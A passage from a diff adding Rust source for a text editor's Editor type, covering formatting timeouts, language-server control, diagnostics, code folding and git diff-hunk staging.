Falling back to selections when format was initiated"); + self.selections.disjoint_anchors() + }); + + let mut timeout = cx.background_executor().timer(FORMAT_TIMEOUT).fuse(); + let format = project.update(cx, |project, cx| { + project.format(buffers, target, true, trigger, cx) + }); + + cx.spawn_in(window, async move |editor, cx| { + let transaction = futures::select_biased! { + transaction = format.log_err().fuse() => transaction, + () = timeout => { + log::warn!("timed out waiting for formatting"); + None + } + }; + + buffer + .update(cx, |buffer, cx| { + if let Some(transaction) = transaction { + if !buffer.is_singleton() { + buffer.push_transaction(&transaction.0, cx); + } + } + cx.notify(); + }) + .ok(); + + if let Some(transaction_id_now) = + buffer.read_with(cx, |b, cx| b.last_transaction_id(cx))? + { + let has_new_transaction = transaction_id_prev != Some(transaction_id_now); + if has_new_transaction { + _ = editor.update(cx, |editor, _| { + editor + .selection_history + .insert_transaction(transaction_id_now, selections_prev); + }); + } + } + + Ok(()) + }) + } + + fn organize_imports( + &mut self, + _: &OrganizeImports, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let project = match &self.project { + Some(project) => project.clone(), + None => return None, + }; + Some(self.perform_code_action_kind( + project, + CodeActionKind::SOURCE_ORGANIZE_IMPORTS, + window, + cx, + )) + } + + fn perform_code_action_kind( + &mut self, + project: Entity, + kind: CodeActionKind, + window: &mut Window, + cx: &mut Context, + ) -> Task> { + let buffer = self.buffer.clone(); + let buffers = buffer.read(cx).all_buffers(); + let mut timeout = cx.background_executor().timer(CODE_ACTION_TIMEOUT).fuse(); + let apply_action = project.update(cx, |project, cx| { + project.apply_code_action_kind(buffers, kind, true, cx) + }); + cx.spawn_in(window, async move |_, cx| { + let transaction = 
futures::select_biased! { + () = timeout => { + log::warn!("timed out waiting for executing code action"); + None + } + transaction = apply_action.log_err().fuse() => transaction, + }; + buffer + .update(cx, |buffer, cx| { + // check if we need this + if let Some(transaction) = transaction { + if !buffer.is_singleton() { + buffer.push_transaction(&transaction.0, cx); + } + } + cx.notify(); + }) + .ok(); + Ok(()) + }) + } + + fn restart_language_server( + &mut self, + _: &RestartLanguageServer, + _: &mut Window, + cx: &mut Context, + ) { + if let Some(project) = self.project.clone() { + self.buffer.update(cx, |multi_buffer, cx| { + project.update(cx, |project, cx| { + project.restart_language_servers_for_buffers( + multi_buffer.all_buffers().into_iter().collect(), + cx, + ); + }); + }) + } + } + + fn stop_language_server( + &mut self, + _: &StopLanguageServer, + _: &mut Window, + cx: &mut Context, + ) { + if let Some(project) = self.project.clone() { + self.buffer.update(cx, |multi_buffer, cx| { + project.update(cx, |project, cx| { + project.stop_language_servers_for_buffers( + multi_buffer.all_buffers().into_iter().collect(), + cx, + ); + cx.emit(project::Event::RefreshInlayHints); + }); + }); + } + } + + fn cancel_language_server_work( + workspace: &mut Workspace, + _: &actions::CancelLanguageServerWork, + _: &mut Window, + cx: &mut Context, + ) { + let project = workspace.project(); + let buffers = workspace + .active_item(cx) + .and_then(|item| item.act_as::(cx)) + .map_or(HashSet::default(), |editor| { + editor.read(cx).buffer.read(cx).all_buffers() + }); + project.update(cx, |project, cx| { + project.cancel_language_server_work_for_buffers(buffers, cx); + }); + } + + fn show_character_palette( + &mut self, + _: &ShowCharacterPalette, + window: &mut Window, + _: &mut Context, + ) { + window.show_character_palette(); + } + + fn refresh_active_diagnostics(&mut self, cx: &mut Context) { + if let ActiveDiagnostic::Group(active_diagnostics) = &mut 
self.active_diagnostics { + let buffer = self.buffer.read(cx).snapshot(cx); + let primary_range_start = active_diagnostics.active_range.start.to_offset(&buffer); + let primary_range_end = active_diagnostics.active_range.end.to_offset(&buffer); + let is_valid = buffer + .diagnostics_in_range::(primary_range_start..primary_range_end) + .any(|entry| { + entry.diagnostic.is_primary + && !entry.range.is_empty() + && entry.range.start == primary_range_start + && entry.diagnostic.message == active_diagnostics.active_message + }); + + if !is_valid { + self.dismiss_diagnostics(cx); + } + } + } + + pub fn active_diagnostic_group(&self) -> Option<&ActiveDiagnosticGroup> { + match &self.active_diagnostics { + ActiveDiagnostic::Group(group) => Some(group), + _ => None, + } + } + + pub fn set_all_diagnostics_active(&mut self, cx: &mut Context) { + self.dismiss_diagnostics(cx); + self.active_diagnostics = ActiveDiagnostic::All; + } + + fn activate_diagnostics( + &mut self, + buffer_id: BufferId, + diagnostic: DiagnosticEntry, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + } + self.dismiss_diagnostics(cx); + let snapshot = self.snapshot(window, cx); + let buffer = self.buffer.read(cx).snapshot(cx); + let Some(renderer) = GlobalDiagnosticRenderer::global(cx) else { + return; + }; + + let diagnostic_group = buffer + .diagnostic_group(buffer_id, diagnostic.diagnostic.group_id) + .collect::>(); + + let blocks = + renderer.render_group(diagnostic_group, buffer_id, snapshot, cx.weak_entity(), cx); + + let blocks = self.display_map.update(cx, |display_map, cx| { + display_map.insert_blocks(blocks, cx).into_iter().collect() + }); + self.active_diagnostics = ActiveDiagnostic::Group(ActiveDiagnosticGroup { + active_range: buffer.anchor_before(diagnostic.range.start) + ..buffer.anchor_after(diagnostic.range.end), + active_message: diagnostic.diagnostic.message.clone(), + group_id: diagnostic.diagnostic.group_id, + 
blocks, + }); + cx.notify(); + } + + fn dismiss_diagnostics(&mut self, cx: &mut Context) { + if matches!(self.active_diagnostics, ActiveDiagnostic::All) { + return; + }; + + let prev = mem::replace(&mut self.active_diagnostics, ActiveDiagnostic::None); + if let ActiveDiagnostic::Group(group) = prev { + self.display_map.update(cx, |display_map, cx| { + display_map.remove_blocks(group.blocks, cx); + }); + cx.notify(); + } + } + + /// Disable inline diagnostics rendering for this editor. + pub fn disable_inline_diagnostics(&mut self) { + self.inline_diagnostics_enabled = false; + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + } + + pub fn inline_diagnostics_enabled(&self) -> bool { + self.inline_diagnostics_enabled + } + + pub fn show_inline_diagnostics(&self) -> bool { + self.show_inline_diagnostics + } + + pub fn toggle_inline_diagnostics( + &mut self, + _: &ToggleInlineDiagnostics, + window: &mut Window, + cx: &mut Context, + ) { + self.show_inline_diagnostics = !self.show_inline_diagnostics; + self.refresh_inline_diagnostics(false, window, cx); + } + + fn refresh_inline_diagnostics( + &mut self, + debounce: bool, + window: &mut Window, + cx: &mut Context, + ) { + if !self.inline_diagnostics_enabled || !self.show_inline_diagnostics { + self.inline_diagnostics_update = Task::ready(()); + self.inline_diagnostics.clear(); + return; + } + + let debounce_ms = ProjectSettings::get_global(cx) + .diagnostics + .inline + .update_debounce_ms; + let debounce = if debounce && debounce_ms > 0 { + Some(Duration::from_millis(debounce_ms)) + } else { + None + }; + self.inline_diagnostics_update = cx.spawn_in(window, async move |editor, cx| { + let editor = editor.upgrade().unwrap(); + + if let Some(debounce) = debounce { + cx.background_executor().timer(debounce).await; + } + let Some(snapshot) = editor + .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) + .ok() + else { + return; + }; + + let new_inline_diagnostics = cx + 
.background_spawn(async move { + let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); + for diagnostic_entry in snapshot.diagnostics_in_range(0..snapshot.len()) { + let message = diagnostic_entry + .diagnostic + .message + .split_once('\n') + .map(|(line, _)| line) + .map(SharedString::new) + .unwrap_or_else(|| { + SharedString::from(diagnostic_entry.diagnostic.message) + }); + let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); + let (Ok(i) | Err(i)) = inline_diagnostics + .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, &snapshot)); + inline_diagnostics.insert( + i, + ( + start_anchor, + InlineDiagnostic { + message, + group_id: diagnostic_entry.diagnostic.group_id, + start: diagnostic_entry.range.start.to_point(&snapshot), + is_primary: diagnostic_entry.diagnostic.is_primary, + severity: diagnostic_entry.diagnostic.severity, + }, + ), + ); + } + inline_diagnostics + }) + .await; + + editor + .update(cx, |editor, cx| { + editor.inline_diagnostics = new_inline_diagnostics; + cx.notify(); + }) + .ok(); + }); + } + + pub fn set_selections_from_remote( + &mut self, + selections: Vec>, + pending_selection: Option>, + window: &mut Window, + cx: &mut Context, + ) { + let old_cursor_position = self.selections.newest_anchor().head(); + self.selections.change_with(cx, |s| { + s.select_anchors(selections); + if let Some(pending_selection) = pending_selection { + s.set_pending(pending_selection, SelectMode::Character); + } else { + s.clear_pending(); + } + }); + self.selections_did_change(false, &old_cursor_position, true, window, cx); + } + + fn push_to_selection_history(&mut self) { + self.selection_history.push(SelectionHistoryEntry { + selections: self.selections.disjoint_anchors(), + select_next_state: self.select_next_state.clone(), + select_prev_state: self.select_prev_state.clone(), + add_selections_state: self.add_selections_state.clone(), + }); + } + + pub fn transact( + &mut self, + window: &mut Window, + cx: &mut 
Context, + update: impl FnOnce(&mut Self, &mut Window, &mut Context), + ) -> Option { + self.start_transaction_at(Instant::now(), window, cx); + update(self, window, cx); + self.end_transaction_at(Instant::now(), cx) + } + + pub fn start_transaction_at( + &mut self, + now: Instant, + window: &mut Window, + cx: &mut Context, + ) { + self.end_selection(window, cx); + if let Some(tx_id) = self + .buffer + .update(cx, |buffer, cx| buffer.start_transaction_at(now, cx)) + { + self.selection_history + .insert_transaction(tx_id, self.selections.disjoint_anchors()); + cx.emit(EditorEvent::TransactionBegun { + transaction_id: tx_id, + }) + } + } + + pub fn end_transaction_at( + &mut self, + now: Instant, + cx: &mut Context, + ) -> Option { + if let Some(transaction_id) = self + .buffer + .update(cx, |buffer, cx| buffer.end_transaction_at(now, cx)) + { + if let Some((_, end_selections)) = + self.selection_history.transaction_mut(transaction_id) + { + *end_selections = Some(self.selections.disjoint_anchors()); + } else { + log::error!("unexpectedly ended a transaction that wasn't started by this editor"); + } + + cx.emit(EditorEvent::Edited { transaction_id }); + Some(transaction_id) + } else { + None + } + } + + pub fn set_mark(&mut self, _: &actions::SetMark, window: &mut Window, cx: &mut Context) { + if self.selection_mark_mode { + self.change_selections(None, window, cx, |s| { + s.move_with(|_, sel| { + sel.collapse_to(sel.head(), SelectionGoal::None); + }); + }) + } + self.selection_mark_mode = true; + cx.notify(); + } + + pub fn swap_selection_ends( + &mut self, + _: &actions::SwapSelectionEnds, + window: &mut Window, + cx: &mut Context, + ) { + self.change_selections(None, window, cx, |s| { + s.move_with(|_, sel| { + if sel.start != sel.end { + sel.reversed = !sel.reversed + } + }); + }); + self.request_autoscroll(Autoscroll::newest(), cx); + cx.notify(); + } + + pub fn toggle_fold( + &mut self, + _: &actions::ToggleFold, + window: &mut Window, + cx: &mut Context, + ) { 
+ if self.is_singleton(cx) { + let selection = self.selections.newest::(cx); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let range = if selection.is_empty() { + let point = selection.head().to_display_point(&display_map); + let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); + let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) + .to_point(&display_map); + start..end + } else { + selection.range() + }; + if display_map.folds_in_range(range).next().is_some() { + self.unfold_lines(&Default::default(), window, cx) + } else { + self.fold(&Default::default(), window, cx) + } + } else { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_ids: HashSet<_> = self + .selections + .disjoint_anchor_ranges() + .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) + .collect(); + + let should_unfold = buffer_ids + .iter() + .any(|buffer_id| self.is_buffer_folded(*buffer_id, cx)); + + for buffer_id in buffer_ids { + if should_unfold { + self.unfold_buffer(buffer_id, cx); + } else { + self.fold_buffer(buffer_id, cx); + } + } + } + } + + pub fn toggle_fold_recursive( + &mut self, + _: &actions::ToggleFoldRecursive, + window: &mut Window, + cx: &mut Context, + ) { + let selection = self.selections.newest::(cx); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let range = if selection.is_empty() { + let point = selection.head().to_display_point(&display_map); + let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); + let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) + .to_point(&display_map); + start..end + } else { + selection.range() + }; + if display_map.folds_in_range(range).next().is_some() { + self.unfold_recursive(&Default::default(), window, cx) + } else { + self.fold_recursive(&Default::default(), window, cx) + } + } + + pub fn fold(&mut self, _: &actions::Fold, window: &mut Window, 
cx: &mut Context) { + if self.is_singleton(cx) { + let mut to_fold = Vec::new(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all_adjusted(cx); + + for selection in selections { + let range = selection.range().sorted(); + let buffer_start_row = range.start.row; + + if range.start.row != range.end.row { + let mut found = false; + let mut row = range.start.row; + while row <= range.end.row { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) + { + found = true; + row = crease.range().end.row + 1; + to_fold.push(crease); + } else { + row += 1 + } + } + if found { + continue; + } + } + + for row in (0..=range.start.row).rev() { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { + if crease.range().end.row >= buffer_start_row { + to_fold.push(crease); + if row <= range.start.row { + break; + } + } + } + } + } + + self.fold_creases(to_fold, true, window, cx); + } else { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_ids = self + .selections + .disjoint_anchor_ranges() + .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) + .collect::>(); + for buffer_id in buffer_ids { + self.fold_buffer(buffer_id, cx); + } + } + } + + fn fold_at_level( + &mut self, + fold_at: &FoldAtLevel, + window: &mut Window, + cx: &mut Context, + ) { + if !self.buffer.read(cx).is_singleton() { + return; + } + + let fold_at_level = fold_at.0; + let snapshot = self.buffer.read(cx).snapshot(cx); + let mut to_fold = Vec::new(); + let mut stack = vec![(0, snapshot.max_row().0, 1)]; + + while let Some((mut start_row, end_row, current_level)) = stack.pop() { + while start_row < end_row { + match self + .snapshot(window, cx) + .crease_for_buffer_row(MultiBufferRow(start_row)) + { + Some(crease) => { + let nested_start_row = crease.range().start.row + 1; + let nested_end_row = crease.range().end.row; + + if current_level < fold_at_level { 
+ stack.push((nested_start_row, nested_end_row, current_level + 1)); + } else if current_level == fold_at_level { + to_fold.push(crease); + } + + start_row = nested_end_row + 1; + } + None => start_row += 1, + } + } + } + + self.fold_creases(to_fold, true, window, cx); + } + + pub fn fold_all(&mut self, _: &actions::FoldAll, window: &mut Window, cx: &mut Context) { + if self.buffer.read(cx).is_singleton() { + let mut fold_ranges = Vec::new(); + let snapshot = self.buffer.read(cx).snapshot(cx); + + for row in 0..snapshot.max_row().0 { + if let Some(foldable_range) = self + .snapshot(window, cx) + .crease_for_buffer_row(MultiBufferRow(row)) + { + fold_ranges.push(foldable_range); + } + } + + self.fold_creases(fold_ranges, true, window, cx); + } else { + self.toggle_fold_multiple_buffers = cx.spawn_in(window, async move |editor, cx| { + editor + .update_in(cx, |editor, _, cx| { + for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { + editor.fold_buffer(buffer_id, cx); + } + }) + .ok(); + }); + } + } + + pub fn fold_function_bodies( + &mut self, + _: &actions::FoldFunctionBodies, + window: &mut Window, + cx: &mut Context, + ) { + let snapshot = self.buffer.read(cx).snapshot(cx); + + let ranges = snapshot + .text_object_ranges(0..snapshot.len(), TreeSitterOptions::default()) + .filter_map(|(range, obj)| (obj == TextObject::InsideFunction).then_some(range)) + .collect::>(); + + let creases = ranges + .into_iter() + .map(|range| Crease::simple(range, self.display_map.read(cx).fold_placeholder.clone())) + .collect(); + + self.fold_creases(creases, true, window, cx); + } + + pub fn fold_recursive( + &mut self, + _: &actions::FoldRecursive, + window: &mut Window, + cx: &mut Context, + ) { + let mut to_fold = Vec::new(); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all_adjusted(cx); + + for selection in selections { + let range = selection.range().sorted(); + let buffer_start_row = range.start.row; + 
+ if range.start.row != range.end.row { + let mut found = false; + for row in range.start.row..=range.end.row { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { + found = true; + to_fold.push(crease); + } + } + if found { + continue; + } + } + + for row in (0..=range.start.row).rev() { + if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { + if crease.range().end.row >= buffer_start_row { + to_fold.push(crease); + } else { + break; + } + } + } + } + + self.fold_creases(to_fold, true, window, cx); + } + + pub fn fold_at( + &mut self, + buffer_row: MultiBufferRow, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + if let Some(crease) = display_map.crease_for_buffer_row(buffer_row) { + let autoscroll = self + .selections + .all::(cx) + .iter() + .any(|selection| crease.range().overlaps(&selection.range())); + + self.fold_creases(vec![crease], autoscroll, window, cx); + } + } + + pub fn unfold_lines(&mut self, _: &UnfoldLines, _window: &mut Window, cx: &mut Context) { + if self.is_singleton(cx) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + let selections = self.selections.all::(cx); + let ranges = selections + .iter() + .map(|s| { + let range = s.display_range(&display_map).sorted(); + let mut start = range.start.to_point(&display_map); + let mut end = range.end.to_point(&display_map); + start.column = 0; + end.column = buffer.line_len(MultiBufferRow(end.row)); + start..end + }) + .collect::>(); + + self.unfold_ranges(&ranges, true, true, cx); + } else { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_ids = self + .selections + .disjoint_anchor_ranges() + .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) + .collect::>(); + for buffer_id in buffer_ids { + self.unfold_buffer(buffer_id, cx); + } + } + } + + pub 
fn unfold_recursive( + &mut self, + _: &UnfoldRecursive, + _window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let selections = self.selections.all::(cx); + let ranges = selections + .iter() + .map(|s| { + let mut range = s.display_range(&display_map).sorted(); + *range.start.column_mut() = 0; + *range.end.column_mut() = display_map.line_len(range.end.row()); + let start = range.start.to_point(&display_map); + let end = range.end.to_point(&display_map); + start..end + }) + .collect::>(); + + self.unfold_ranges(&ranges, true, true, cx); + } + + pub fn unfold_at( + &mut self, + buffer_row: MultiBufferRow, + _window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + let intersection_range = Point::new(buffer_row.0, 0) + ..Point::new( + buffer_row.0, + display_map.buffer_snapshot.line_len(buffer_row), + ); + + let autoscroll = self + .selections + .all::(cx) + .iter() + .any(|selection| RangeExt::overlaps(&selection.range(), &intersection_range)); + + self.unfold_ranges(&[intersection_range], true, autoscroll, cx); + } + + pub fn unfold_all( + &mut self, + _: &actions::UnfoldAll, + _window: &mut Window, + cx: &mut Context, + ) { + if self.buffer.read(cx).is_singleton() { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + self.unfold_ranges(&[0..display_map.buffer_snapshot.len()], true, true, cx); + } else { + self.toggle_fold_multiple_buffers = cx.spawn(async move |editor, cx| { + editor + .update(cx, |editor, cx| { + for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { + editor.unfold_buffer(buffer_id, cx); + } + }) + .ok(); + }); + } + } + + pub fn fold_selected_ranges( + &mut self, + _: &FoldSelectedRanges, + window: &mut Window, + cx: &mut Context, + ) { + let selections = self.selections.all_adjusted(cx); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + 
let ranges = selections + .into_iter() + .map(|s| Crease::simple(s.range(), display_map.fold_placeholder.clone())) + .collect::>(); + self.fold_creases(ranges, true, window, cx); + } + + pub fn fold_ranges( + &mut self, + ranges: Vec>, + auto_scroll: bool, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let ranges = ranges + .into_iter() + .map(|r| Crease::simple(r, display_map.fold_placeholder.clone())) + .collect::>(); + self.fold_creases(ranges, auto_scroll, window, cx); + } + + pub fn fold_creases( + &mut self, + creases: Vec>, + auto_scroll: bool, + _window: &mut Window, + cx: &mut Context, + ) { + if creases.is_empty() { + return; + } + + let mut buffers_affected = HashSet::default(); + let multi_buffer = self.buffer().read(cx); + for crease in &creases { + if let Some((_, buffer, _)) = + multi_buffer.excerpt_containing(crease.range().start.clone(), cx) + { + buffers_affected.insert(buffer.read(cx).remote_id()); + }; + } + + self.display_map.update(cx, |map, cx| map.fold(creases, cx)); + + if auto_scroll { + self.request_autoscroll(Autoscroll::fit(), cx); + } + + cx.notify(); + + self.scrollbar_marker_state.dirty = true; + self.folds_did_change(cx); + } + + /// Removes any folds whose ranges intersect any of the given ranges. 
+ pub fn unfold_ranges( + &mut self, + ranges: &[Range], + inclusive: bool, + auto_scroll: bool, + cx: &mut Context, + ) { + self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { + map.unfold_intersecting(ranges.iter().cloned(), inclusive, cx) + }); + self.folds_did_change(cx); + } + + pub fn fold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { + if self.buffer().read(cx).is_singleton() || self.is_buffer_folded(buffer_id, cx) { + return; + } + let folded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); + self.display_map.update(cx, |display_map, cx| { + display_map.fold_buffers([buffer_id], cx) + }); + cx.emit(EditorEvent::BufferFoldToggled { + ids: folded_excerpts.iter().map(|&(id, _)| id).collect(), + folded: true, + }); + cx.notify(); + } + + pub fn unfold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { + if self.buffer().read(cx).is_singleton() || !self.is_buffer_folded(buffer_id, cx) { + return; + } + let unfolded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); + self.display_map.update(cx, |display_map, cx| { + display_map.unfold_buffers([buffer_id], cx); + }); + cx.emit(EditorEvent::BufferFoldToggled { + ids: unfolded_excerpts.iter().map(|&(id, _)| id).collect(), + folded: false, + }); + cx.notify(); + } + + pub fn is_buffer_folded(&self, buffer: BufferId, cx: &App) -> bool { + self.display_map.read(cx).is_buffer_folded(buffer) + } + + pub fn folded_buffers<'a>(&self, cx: &'a App) -> &'a HashSet { + self.display_map.read(cx).folded_buffers() + } + + pub fn disable_header_for_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { + self.display_map.update(cx, |display_map, cx| { + display_map.disable_header_for_buffer(buffer_id, cx); + }); + cx.notify(); + } + + /// Removes any folds with the given ranges. 
+ pub fn remove_folds_with_type( + &mut self, + ranges: &[Range], + type_id: TypeId, + auto_scroll: bool, + cx: &mut Context, + ) { + self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { + map.remove_folds_with_type(ranges.iter().cloned(), type_id, cx) + }); + self.folds_did_change(cx); + } + + fn remove_folds_with( + &mut self, + ranges: &[Range], + auto_scroll: bool, + cx: &mut Context, + update: impl FnOnce(&mut DisplayMap, &mut Context), + ) { + if ranges.is_empty() { + return; + } + + let mut buffers_affected = HashSet::default(); + let multi_buffer = self.buffer().read(cx); + for range in ranges { + if let Some((_, buffer, _)) = multi_buffer.excerpt_containing(range.start.clone(), cx) { + buffers_affected.insert(buffer.read(cx).remote_id()); + }; + } + + self.display_map.update(cx, update); + + if auto_scroll { + self.request_autoscroll(Autoscroll::fit(), cx); + } + + cx.notify(); + self.scrollbar_marker_state.dirty = true; + self.active_indent_guides_state.dirty = true; + } + + pub fn update_fold_widths( + &mut self, + widths: impl IntoIterator, + cx: &mut Context, + ) -> bool { + self.display_map + .update(cx, |map, cx| map.update_fold_widths(widths, cx)) + } + + pub fn default_fold_placeholder(&self, cx: &App) -> FoldPlaceholder { + self.display_map.read(cx).fold_placeholder.clone() + } + + pub fn set_expand_all_diff_hunks(&mut self, cx: &mut App) { + self.buffer.update(cx, |buffer, cx| { + buffer.set_all_diff_hunks_expanded(cx); + }); + } + + pub fn expand_all_diff_hunks( + &mut self, + _: &ExpandAllDiffHunks, + _window: &mut Window, + cx: &mut Context, + ) { + self.buffer.update(cx, |buffer, cx| { + buffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx) + }); + } + + pub fn toggle_selected_diff_hunks( + &mut self, + _: &ToggleSelectedDiffHunks, + _window: &mut Window, + cx: &mut Context, + ) { + let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); + self.toggle_diff_hunks_in_ranges(ranges, cx); + } + + pub 
fn diff_hunks_in_ranges<'a>( + &'a self, + ranges: &'a [Range], + buffer: &'a MultiBufferSnapshot, + ) -> impl 'a + Iterator { + ranges.iter().flat_map(move |range| { + let end_excerpt_id = range.end.excerpt_id; + let range = range.to_point(buffer); + let mut peek_end = range.end; + if range.end.row < buffer.max_row().0 { + peek_end = Point::new(range.end.row + 1, 0); + } + buffer + .diff_hunks_in_range(range.start..peek_end) + .filter(move |hunk| hunk.excerpt_id.cmp(&end_excerpt_id, buffer).is_le()) + }) + } + + pub fn has_stageable_diff_hunks_in_ranges( + &self, + ranges: &[Range], + snapshot: &MultiBufferSnapshot, + ) -> bool { + let mut hunks = self.diff_hunks_in_ranges(ranges, &snapshot); + hunks.any(|hunk| hunk.status().has_secondary_hunk()) + } + + pub fn toggle_staged_selected_diff_hunks( + &mut self, + _: &::git::ToggleStaged, + _: &mut Window, + cx: &mut Context, + ) { + let snapshot = self.buffer.read(cx).snapshot(cx); + let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); + let stage = self.has_stageable_diff_hunks_in_ranges(&ranges, &snapshot); + self.stage_or_unstage_diff_hunks(stage, ranges, cx); + } + + pub fn set_render_diff_hunk_controls( + &mut self, + render_diff_hunk_controls: RenderDiffHunkControlsFn, + cx: &mut Context, + ) { + self.render_diff_hunk_controls = render_diff_hunk_controls; + cx.notify(); + } + + pub fn stage_and_next( + &mut self, + _: &::git::StageAndNext, + window: &mut Window, + cx: &mut Context, + ) { + self.do_stage_or_unstage_and_next(true, window, cx); + } + + pub fn unstage_and_next( + &mut self, + _: &::git::UnstageAndNext, + window: &mut Window, + cx: &mut Context, + ) { + self.do_stage_or_unstage_and_next(false, window, cx); + } + + pub fn stage_or_unstage_diff_hunks( + &mut self, + stage: bool, + ranges: Vec>, + cx: &mut Context, + ) { + let task = self.save_buffers_for_ranges_if_needed(&ranges, cx); + cx.spawn(async move |this, cx| { + task.await?; + this.update(cx, |this, cx| { + let 
snapshot = this.buffer.read(cx).snapshot(cx); + let chunk_by = this + .diff_hunks_in_ranges(&ranges, &snapshot) + .chunk_by(|hunk| hunk.buffer_id); + for (buffer_id, hunks) in &chunk_by { + this.do_stage_or_unstage(stage, buffer_id, hunks, cx); + } + }) + }) + .detach_and_log_err(cx); + } + + fn save_buffers_for_ranges_if_needed( + &mut self, + ranges: &[Range], + cx: &mut Context, + ) -> Task> { + let multibuffer = self.buffer.read(cx); + let snapshot = multibuffer.read(cx); + let buffer_ids: HashSet<_> = ranges + .iter() + .flat_map(|range| snapshot.buffer_ids_for_range(range.clone())) + .collect(); + drop(snapshot); + + let mut buffers = HashSet::default(); + for buffer_id in buffer_ids { + if let Some(buffer_entity) = multibuffer.buffer(buffer_id) { + let buffer = buffer_entity.read(cx); + if buffer.file().is_some_and(|file| file.disk_state().exists()) && buffer.is_dirty() + { + buffers.insert(buffer_entity); + } + } + } + + if let Some(project) = &self.project { + project.update(cx, |project, cx| project.save_buffers(buffers, cx)) + } else { + Task::ready(Ok(())) + } + } + + fn do_stage_or_unstage_and_next( + &mut self, + stage: bool, + window: &mut Window, + cx: &mut Context, + ) { + let ranges = self.selections.disjoint_anchor_ranges().collect::>(); + + if ranges.iter().any(|range| range.start != range.end) { + self.stage_or_unstage_diff_hunks(stage, ranges, cx); + return; + } + + self.stage_or_unstage_diff_hunks(stage, ranges, cx); + let snapshot = self.snapshot(window, cx); + let position = self.selections.newest::(cx).head(); + let mut row = snapshot + .buffer_snapshot + .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) + .find(|hunk| hunk.row_range.start.0 > position.row) + .map(|hunk| hunk.row_range.start); + + let all_diff_hunks_expanded = self.buffer().read(cx).all_diff_hunks_expanded(); + // Outside of the project diff editor, wrap around to the beginning. 
+ if !all_diff_hunks_expanded { + row = row.or_else(|| { + snapshot + .buffer_snapshot + .diff_hunks_in_range(Point::zero()..position) + .find(|hunk| hunk.row_range.end.0 < position.row) + .map(|hunk| hunk.row_range.start) + }); + } + + if let Some(row) = row { + let destination = Point::new(row.0, 0); + let autoscroll = Autoscroll::center(); + + self.unfold_ranges(&[destination..destination], false, false, cx); + self.change_selections(Some(autoscroll), window, cx, |s| { + s.select_ranges([destination..destination]); + }); + } + } + + fn do_stage_or_unstage( + &self, + stage: bool, + buffer_id: BufferId, + hunks: impl Iterator, + cx: &mut App, + ) -> Option<()> { + let project = self.project.as_ref()?; + let buffer = project.read(cx).buffer_for_id(buffer_id, cx)?; + let diff = self.buffer.read(cx).diff_for(buffer_id)?; + let buffer_snapshot = buffer.read(cx).snapshot(); + let file_exists = buffer_snapshot + .file() + .is_some_and(|file| file.disk_state().exists()); + diff.update(cx, |diff, cx| { + diff.stage_or_unstage_hunks( + stage, + &hunks + .map(|hunk| buffer_diff::DiffHunk { + buffer_range: hunk.buffer_range, + diff_base_byte_range: hunk.diff_base_byte_range, + secondary_status: hunk.secondary_status, + range: Point::zero()..Point::zero(), // unused + }) + .collect::>(), + &buffer_snapshot, + file_exists, + cx, + ) + }); + None + } + + pub fn expand_selected_diff_hunks(&mut self, cx: &mut Context) { + let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); + self.buffer + .update(cx, |buffer, cx| buffer.expand_diff_hunks(ranges, cx)) + } + + pub fn clear_expanded_diff_hunks(&mut self, cx: &mut Context) -> bool { + self.buffer.update(cx, |buffer, cx| { + let ranges = vec![Anchor::min()..Anchor::max()]; + if 